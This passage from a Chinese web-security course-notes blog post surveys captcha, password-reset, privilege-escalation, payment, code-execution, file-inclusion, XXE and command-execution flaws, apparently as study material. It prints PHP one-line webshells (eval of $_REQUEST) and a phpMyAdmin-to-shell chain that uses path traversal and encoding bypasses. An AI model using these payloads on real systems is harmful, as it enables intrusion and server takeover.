<li><p>验证码出现在UML内=&gt;直接在UML里获取验证码</p>
</li>
<li><p>验证码有规律=&gt;有些验证码按照规律生成(如按照时间戳)</p>
</li>
<li><p>万能验证码=&gt;输入000000能直接绕过（工作人员为了方便设备体调试而设置）</p>
</li>
<li><p>验证码太少，可以通过手动建库来识别匹对（如图片验证码）<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102178">实例</a></p>
</li>
<li><p>基于IP给验证码</p>
<p>绕过方法：</p>
<ul>
<li>换IP[脚本换IP 代理池 自搭建免费代理池]</li>
<li>换IP[通用X-FORWARDED-FOR来换IP ]</li>
</ul>
</li>
<li><p>验证码可能会藏在Cookie里</p>
</li>
</ol>
</li>
<li><p>身份验证码<br>为了区分使用者的身份（手机登录验证码、邮箱验证码等等）</p>
</li>
</ul>
<h2 id="密码找回"><a href="#密码找回" class="headerlink" title="密码找回"></a>密码找回</h2><ul>
<li><p>身份验证码<br>为了区分使用者的身份（手机登录验证码、邮箱验证码等等）</p>
</li>
<li><p>存在问题：</p>
<ol>
<li>验证码发送后从前端返回 =&gt; 点击发送后，验证码能通过抓返回包获取<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0114577">实例</a></li>
<li>验证码无次数限制可以爆破<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0155994">实例</a></li>
<li>验证码控 =&gt;可通过抓包修改传参来改变验证短信的内容<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086716">实例</a></li>
<li>直接修改密码页面 =&gt; 跳过验证页面直接转入修改密码页面<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-040908">实例</a></li>
<li>越权漏洞 =&gt;自己验证码通过改包来修改目标密码<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102205">实例</a></li>
</ol>
</li>
</ul>
<h2 id="越权漏洞"><a href="#越权漏洞" class="headerlink" title="越权漏洞"></a>越权漏洞</h2><ul>
<li><p>概念：一个用户能使用另一个用户的权限</p>
</li>
<li><p>分类=&gt;水平越权和垂直越权</p>
<p>  水平越权：相同权限下不同的用户可以相互访问（用户A &lt;-&gt; 用户B）</p>
<p>  垂直越权：权限低的用户可以访问到权限较高的用户（用户A&lt;-&gt;管理员A）</p>
</li>
<li><p>寻找方式（注册两个账号进行抓包改包尝试）</p>
<ol>
<li>通过修改GET传参来越权(实例)[<a target="_blank" rel="noopener" href="http://cn-sec.com/archives/2576.html]">http://cn-sec.com/archives/2576.html]</a></li>
<li>通过修改POST传参来越权(实例)[<a target="_blank" rel="noopener" href="http://cn-sec.com/archives/1682.html]">http://cn-sec.com/archives/1682.html]</a></li>
<li>通过修改cookie传参来越权(实例)[<a target="_blank" rel="noopener" href="http://cn-sec.com/archives/6421.html]">http://cn-sec.com/archives/6421.html]</a></li>
</ol>
</li>
</ul>
<h2 id="支付漏洞"><a href="#支付漏洞" class="headerlink" title="支付漏洞"></a>支付漏洞</h2><ul>
<li><p>支付方式</p>
<ul>
<li>大部分的商户（支付宝、微信、银联）</li>
<li>用户、商家、三方平台</li>
<li>(用户[传参] -&gt; 商家[计算出] -&gt;支付宝 -&gt; 商家 -&gt;用户)</li>
<li>支付宝 给了你一个数据，然后你告诉商家你付了钱</li>
</ul>
</li>
</ul>
<ul>
<li><p>防护方法：</p>
<ul>
<li><p>加密是有用的（起码可以筛掉一批）</p>
<ol>
<li>加密可能被解密</li>
<li>加密也可以复用</li>
<li>数据包中的加密是怎么产生（前端决定）</li>
</ol>
</li>
<li><p>校验：商品和钱的传参应该是要校验</p>
</li>
</ul>
</li>
</ul>
<ul>
<li>攻击方式<ul>
<li>改价格</li>
<li>改数量</li>
<li>越权支付</li>
<li>改运费</li>
<li>优惠券叠加</li>
<li>改订单状态</li>
<li>生成两个订单：   订单A:500   (id:1)  订单B:50 （id:2）</li>
</ul>
</li>
</ul>
<ul>
<li><p>附件id值： 1(100) 2(1000) 3 4 5 6  第105个<br>  他直接批量购买105个之后的附件</p>
<p>先把没用附件的ID全部买了。 [没用价格 默认0]</p>
<p>数据库会记录你买了XXX</p>
<p>等待附件上传，无论什么价格，都认定为你已经购买</p>
</li>
</ul>
<h1 id="十三、代码执行漏洞"><a href="#十三、代码执行漏洞" class="headerlink" title="十三、代码执行漏洞"></a>十三、代码执行漏洞</h1><ul>
<li>实质：用户所输入的数据被当作后端代码执行</li>
<li>RCE（远程代码执行）</li>
<li>造成代码执行的函数(以PHP为例)：<ul>
<li><strong>eval($a)</strong> : eval（）是把字符串当作代码执行（eval不是函数，因为它不受disable_function的影响）[disable_function是php自带的禁用函数的配置文件]</li>
<li><strong>assert($a)</strong> : 只能执行单行数据，如果遇到，可以尝试用该函数套eval（如：assert(“eval(‘’)”)）,或者使用文件写入（如:file_put_contents(‘1.php’,’<?php?>‘)）</li>
<li><strong>preg_replace()</strong> : 正则替换函数，只要参数里面使用了/e，则可以将内容当作代码执行</li>
<li><strong>create_function()</strong> : 定义一个匿名函数，如：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = create_function(<span class="string">&#x27;$id&#x27;</span>,<span class="string">&#x27;echo $id&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>（<span class="number">8</span>）;</span><br><span class="line"><span class="comment">//输出8</span></span><br></pre></td></tr></table></figure>
其实create_function就是自定义函数的简化，如create_function(‘$id’,’echo $id’)就是为：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span>(<span class="params"><span class="variable">$id</span></span>)</span>&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="variable">$id</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
按照该原理若有自定义函数为：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = create_function(<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;$_REQUEST[8]&#x27;</span>);</span><br></pre></td></tr></table></figure>
可以通过传参8=}<?php eval(1)?>//  可以插入一句话木马</li>
<li><strong>array_map(function要执行的函数,$a需要处理的传参)</strong> : 回调函数=&gt;将传参使用调用函数处理，传参为数组，该函数用于对数组的每个参数依次调用函数处理</li>
<li><strong>双引号二次解析</strong>（适用于Php5.6及以上的版本）：存在代码 “${xxxx}” =&gt; xxxx可以当作代码执行（如一句话木马<?php $a="${file_put_contents('1.php','<xxxxxx>')}"?>）</li>
</ul>
</li>
</ul>
<h1 id="十四、代码审计"><a href="#十四、代码审计" class="headerlink" title="十四、代码审计"></a>十四、代码审计</h1><ul>
<li>代码审计的方法<ol>
<li>通读全文法（将目标所有代码全部通读理解）</li>
<li>危险函数定位法（与源码之中查找危险函数，如：sqli_connect,来进行局部代码分析来查找漏洞）</li>
</ol>
</li>
</ul>
<h1 id="十五、文件包含漏洞"><a href="#十五、文件包含漏洞" class="headerlink" title="十五、文件包含漏洞"></a>十五、文件包含漏洞</h1><blockquote>
<p>概念：一个文件引用了另一个文件的代码（如c语言的include&lt;xxxx.h&gt;）攻击者利用包含的特性，加上应用本身对文件（包含）控制不严格，最终造成攻击者进行任意文件包含。（注：包含的文件会被当成脚本文件来解析）</p>
</blockquote>
<p><strong>文件包含漏洞需要配置文件中的allow_url_include = On才存在</strong></p>
<ul>
<li><p>文件包含引用函数：</p>
<ol>
<li>include() -&gt;用时到才去读取使用</li>
<li>require() -&gt;在代码执行前就去读取包含文件一起执行</li>
</ol>
<p>  <strong>include遇到错误时会继续往下执行，而require则会停止</strong></p>
</li>
</ul>
<ul>
<li><p>文件包含的特性：<strong>文件包含不在乎后缀，只会读取文件内容，将其当作PHP执行</strong></p>
</li>
<li><p>文件包含分类：</p>
<ol>
<li>LFI(本地文件包含)=&gt;只限于本地使用（需要实体文件的支撑-&gt;一句话木马的传上去）</li>
<li>RFI(远程文件包含)=&gt;可以通过远程访问（能远程执行目标文件-&gt;在自己服务器或电脑上访问目标文件即可执行）[木马不存在与目标主机上]<strong>要包含的远程地址一般都是txt</strong></li>
</ol>
<p>  <strong>远程文件包含的危害会大于本地文件包含</strong></p>
</li>
<li><p>了解小知识</p>
</li>
</ul>
<ol>
<li><p>windows的cmd的cd命令</p>
<blockquote>
<p>./ 当前目录</p>
<p>../ 上一目录</p>
<p>cd xxxxxxxxx/../ 任在当前目录，无论xxxxxxx的内容是否存在，windows都会认为其先进入在返回，所以任然在当前目录(注意：php的语句中xxxxxxxx内不能出现“?”，否则会报错)</p>
</blockquote>
</li>
<li><p>phpmyadmin</p>
<blockquote>
<p>phpmyadmin是phpstudy内web端的数据库管理页面，在此内可以对数据库进行各类操作</p>
</blockquote>
</li>
<li><p>mysql数据库文件夹的结构</p>
<blockquote>
<p>mysql文件夹内的数据储存在其DATA文件，各个不同的数据库以库名为文件夹储存，表的数据以“表名.frm”的形式存储在库文件夹中</p>
<p>如：库名为test，表名为temp的数据的路径为：MySql/data/test/temp.frm</p>
</blockquote>
</li>
</ol>
<ul>
<li>漏洞利用<br>在成功登录phpmyadmin后，能通过文件包含漏洞进行shell</li>
</ul>
<p>利用步骤：</p>
<ol>
<li><p>对代码进行代码审计，寻找文件包含漏洞的利用点</p>
</li>
<li><p>于数据库中插入数据，一句话木马（此时为txt形式）</p>
</li>
<li><p>使用文件包含漏洞，使其包含文件为写入一句话木马的位置<br> 如：木马写在test库的temp表，则写入路径为：../../../../../../../../mysql/data/test/temp.frm</p>
<p> 则可将该文件当作php代码执行</p>
</li>
</ol>
<ul>
<li>可能存在问题</li>
</ul>
<ol>
<li>如何知道当前库的路径</li>
</ol>
<p>使用数据库查询语句[select @@basedir]可以获得数据库路径</p>
<ol start="2">
<li>如何确定跳转次数</li>
</ol>
<p>多次使用../使其跳转到根目录</p>
<ol start="3">
<li>如何在其生成一句话木马文件</li>
</ol>
<p>使用file_put_contents()生成，将数据库内写入的数据改为：<?php file_put_contents('1.php','<?php @eval($_REQUEST[8]);?>‘)?&gt;</p>
<ol start="4">
<li>如何绕过‘?’</li>
</ol>
<p>一般情况下，后端对数据处理时，因为数据可能是从浏览器传输，所以会对其进行umldecode()函数进行解码，所以可以使用’?’的umlencode编码来进行绕过（注意：若为GET传参，其本身便会对其解码一次，所以’?’应该进行两次编码）</p>
<h1 id="十六、变量覆盖"><a href="#十六、变量覆盖" class="headerlink" title="十六、变量覆盖"></a>十六、变量覆盖</h1><blockquote>
<p>概念：变量覆盖指的是可以用我们的传参值替换程序原有的变量值</p>
</blockquote>
<ul>
<li><p>如何去寻找变量覆盖</p>
<ol>
<li><p>‘$$’使用不当</p>
</li>
<li><p>extract()函数使用不当</p>
<p> extract（）:把数组变为变量</p>
<p> 实例：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = <span class="string">&quot;1&quot;</span>;</span><br><span class="line"><span class="variable">$my_array</span> = <span class="keyword">array</span>(<span class="string">&quot;a&quot;</span> =&gt; <span class="string">&quot;Cat&quot;</span>,<span class="string">&quot;b&quot;</span> =&gt; <span class="string">&quot;Dog&quot;</span>, <span class="string">&quot;c&quot;</span> =&gt; <span class="string">&quot;Horse&quot;</span>);</span><br><span class="line">extract(<span class="variable">$my_array</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;\$a = <span class="subst">$a</span>; \$b = <span class="subst">$b</span>; \$c = <span class="subst">$c</span>&quot;</span>;</span><br></pre></td></tr></table></figure>
<p> 运行结果：$a = Cat; $b = Dog; $c = Horse</p>
</li>
<li><p>parse_str()函数使用不当</p>
<p> parse_str()：把字符串变成变量</p>
<p> 实例：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">parse_str(<span class="string">&quot;name=zkaq&amp;&amp;age=60&quot;</span>);   <span class="comment">// test=123&amp;gift=123</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$name</span>.<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$age</span>;</span><br></pre></td></tr></table></figure>
<p> 输出了zkaq和60 </p>
<p> 那么parse_str(“name=Bill&amp;age=60”) 相当于完成了$name =’zkaq’和$age =’60’</p>
</li>
<li><p>import_request_variables()使用不当</p>
</li>
<li><p>开启了全局变量注册</p>
</li>
</ol>
</li>
</ul>
<h1 id="十七、XXE漏洞"><a href="#十七、XXE漏洞" class="headerlink" title="十七、XXE漏洞"></a>十七、XXE漏洞</h1><blockquote>
<p>概念：XXE = XML外部实体注入</p>
</blockquote>
<blockquote>
<p>XML:可扩展标记语言|类似HTML|为了传输数据，而不是显示数据（HTML是为了显示数据）|无预定义（没有预先定义好的东西，如：代码，函数但可以自定义如：标签）</p>
</blockquote>
<blockquote>
<p>外部实体：指系统以外，又和系统有联系的人或事物，它说明了数据的外部来源和去处，属于系统的外部和系统的界面。（在xml代码中的DTD部分就是应用外部网站或文件）</p>
</blockquote>
<blockquote>
<p>注入：用户输入的数据被当作代码执行</p>
</blockquote>
<ul>
<li><p>XXE的危害</p>
<p>  XXE可以通过DTD去读取、访问其它文件或网站</p>
</li>
<li><p>漏洞使用</p>
<ol>
<li>使用xml去请求一个自己搭建的php文件或其它文件。（将你想要的数据给带出来）（需要公网ip）</li>
<li>php文件会记录查看你所请求的传参内容（记录文件）</li>
<li>去查看即可</li>
</ol>
</li>
</ul>
<h1 id="十八、反序列化漏洞"><a href="#十八、反序列化漏洞" class="headerlink" title="十八、反序列化漏洞"></a>十八、反序列化漏洞</h1><ul>
<li><p>什么是序列化?</p>
<p>序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间，对象将其当前状态写入到临时或持久性存储区。以后，可以通过从存储区中读取或反序列化对象的状态，重新创建该对象。【<strong>将状态信息保存为字符串</strong>】</p>
<p>简单的理解：将PHP中 对象、类、数组、变量、匿名函数等，转化为字符串，方便保存到数据库或者文件中</p>
<p>序列化：游戏的<strong>存档</strong>  =&gt;  把当前的状态保存下来</p>
<p>反序列化：游戏的<strong>读档</strong>  =&gt;  通过保存下来的信息恢复到当初的状态</p>
<p>序列化和反序列化以 类（class）为主体</p>
</li>
<li><p>魔术方法</p>
<ul>
<li>概念：自动触发的方法（满足条件时函数自动触发）</li>
<li>列子（以PHP为例）<ol>
<li>__construct()：当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。（构造函数）</li>
<li>__destruct()：当对象被销毁时会自动调用。（析构函数）</li>
<li>__wakeup() ：如前所提，unserialize()时会自动调用。</li>
</ol>
</li>
</ul>
</li>
</ul>
<h1 id="十九、命令执行漏洞"><a href="#十九、命令执行漏洞" class="headerlink" title="十九、命令执行漏洞"></a>十九、命令执行漏洞</h1><ul>
<li><p>概念：用户输入的数据被当作系统命令执行</p>
</li>
<li><p>代码执行漏洞 vs 命令执行漏洞</p>
<p>通过代码执行漏洞 -&gt; 都可以调用系统命令  system(‘whoami’)</p>
<p>通过系统命令漏洞 -&gt; 可以通过命令写文件  echo “<?php @eval($_REQUEST[8])?>“ 1.php</p>
</li>
<li><p>漏洞函数</p>
<ol>
<li>system() -&gt;执行命令并且返回结果并输出</li>
<li>exec() -&gt; 只执行，并且只会返回结果的最后一行</li>
<li>shell_exec() -&gt; 执行命令并且返回结果</li>
<li>``[反引号] -&gt;执行命令并且返回结果(shell_exec()的特殊写法，如果该函数被禁则反引号不能使用)</li>
<li>passthru()-&gt; 执行命令并且返回结果并输出</li>
<li>popen() -&gt; 执行命令</li>
</ol>
</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2021/11/20/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/" data-id="cl154b8wv000008t92bu180js" data-title="" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2021/05/19/hello1/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">hello1</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">November 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/05/">May 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/11/20/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/05/19/hello1/">hello1</a>
          </li>
        
          <li>
            <a href="/2021/05/19/hello-jsakd/">hello-jsakd</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 BlueDog<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>